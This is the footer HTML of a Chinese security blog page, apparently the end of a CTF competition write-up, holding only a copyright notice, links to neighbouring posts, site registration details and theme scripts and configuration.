<a id=post-cr-link href=https://zp9080.github.io/post/wp%E5%90%88%E9%9B%86/ccbciscn%E5%88%9D%E8%B5%9B/ title=CCBCISCN初赛>https://zp9080.github.io/post/wp%E5%90%88%E9%9B%86/ccbciscn%E5%88%9D%E8%B5%9B/</a></li><li class=post-copyright-license><strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <i class="fab fa-fw fa-creative-commons"></i><a target=_blank href=https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div><div class=post-nav><div class="post-nav-next post-nav-item"><a href=/post/shellcode/2025%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91babytrace/ rel=next title=2025西湖论剑babytrace><i class="fa fa-chevron-left"></i> 2025西湖论剑babytrace</a></div><div class="post-nav-prev post-nav-item"><a href=/post/pwn%E7%AC%94%E8%AE%B0/%E6%B1%87%E7%BC%96/ rel=prev title=汇编>汇编
<i class="fa fa-chevron-right"></i></a></div></div></footer></article></div></div></main><footer class=footer><div class=footer-inner><div class=copyright>&copy;
<span itemprop=copyrightYear>2024 - 2025
</span><span class=with-love><i class="fa fa-heart"></i>
</span><span class=author itemprop=copyrightHolder>f1ow</span></div><div class=powered-by>由 <a href=https://gohugo.io title=0.126.1 target=_blank>Hugo</a> & <a href=https://github.com/hugo-next/hugo-theme-next title=4.6.3 target=_blank>Hugo NexT.Gemini</a> 强力驱动</div><div class=beian><a href=https://beian.miit.gov.cn target=_blank>鄂ICP备 20240001号</a>
<img src=/imgs/gongan.png alt=鄂公网安备>
<a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=42010002002000" target=_blank>鄂公网安备 42010002002000 号</a></div><div class=vendors-list><a target=_blank href=https://vercel.com title=Vercel><img src=/imgs/img-lazy-loading.gif data-src=/imgs/vendors/vercel.svg alt=Vercel>
</a><a target=_blank href=https://upyun.com title=又拍云><img src=/imgs/img-lazy-loading.gif data-src=/imgs/vendors/upyun.png alt=又拍云>
</a><a target=_blank href=https://github.com title=Github><img src=/imgs/img-lazy-loading.gif data-src=/imgs/vendors/github.svg alt=Github>
</a><span>提供CDN/云资源支持</span></div></div></footer><script type=text/javascript src=https://zp9080.github.io/3rd/animejs/3.2.2/anime.min.js crossorigin=anonymous defer></script><script type=text/javascript src=https://zp9080.github.io/3rd/viewerjs/1.11.6/viewer.min.js crossorigin=anonymous defer></script><script class=next-config data-name=main type=application/json>{"bookmark":{"color":"#222","enable":true,"save":"manual"},"copybtn":true,"darkmode":false,"giscus":{"cfg":{"category":"Comments","categoryid":null,"emit":false,"inputposition":"top","mapping":"title","reactions":false,"repo":"username/repo-name","repoid":null,"theme":"preferred_color_scheme"},"js":"https://giscus.app/client.js"},"hostname":"https://zp9080.github.io/","i18n":{"ds_day":" 天前","ds_days":" 天 ","ds_hour":" 小时前","ds_hours":" 小时 ","ds_just":"刚刚","ds_min":" 分钟前","ds_mins":" 分钟","ds_month":" 个月前","ds_years":" 年 ","empty":"没有找到任何搜索结果：${query}","hits":"找到 ${hits} 个搜索结果","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","placeholder":"搜索..."},"lang":"zh-CN","lazyload":false,"localSearch":{"enable":true,"limit":1e3,"path":"/searchindexes.xml","preload":false,"topnperarticle":-1,"trigger":"auto","unescape":false},"motion":{"async":true,"enable":true,"transition":{"collheader":"fadeInLeft","postblock":"fadeIn","postbody":"fadeInDown","postheader":"fadeInDown","sidebar":"fadeInUp"}},"postmeta":{"comments":{"enable":true,"plugin":"waline"},"views":{"enable":true,"plugin":"busuanzi"}},"root":"/","scheme":"Gemini","sidebar":{"display":"post","offset":12,"padding":18,"position":"left","width":256},"vendor":{"plugins":"local","router":{"name":"local","type":"modern","url":"https://zp9080.github.io/3rd"}},"version":"4.6.3","waline":{"cfg":{"emoji":false,"imguploader":false,"placeholder":"请文明发言哟 ヾ(≧▽≦*)o","reaction":true,"reactiontext":["点赞","踩一下","得意","不屑","尴尬","睡觉"],"reactiontitle":"你认为这篇文章怎么样？","requiredmeta":["nick","mail"],"serverurl":null,"sofa":"快来发表你的意见吧 (≧∀≦)ゞ","wordlimit":200},"css":{"alias":"@waline/client","file":"dist/waline.css","name":"waline","version":"2.15.8"},"js":{"alias":"@waline/client","file":"dist/waline.js","name":"waline","version":"2.15.8"}}}</script><script type=text/javascript src=/js/main.min.befa9b7d22ec90da86c74c5dbff5ee42c12e9fc6d6f4448bfcc596cc329b19e8.js defer></script></body></html>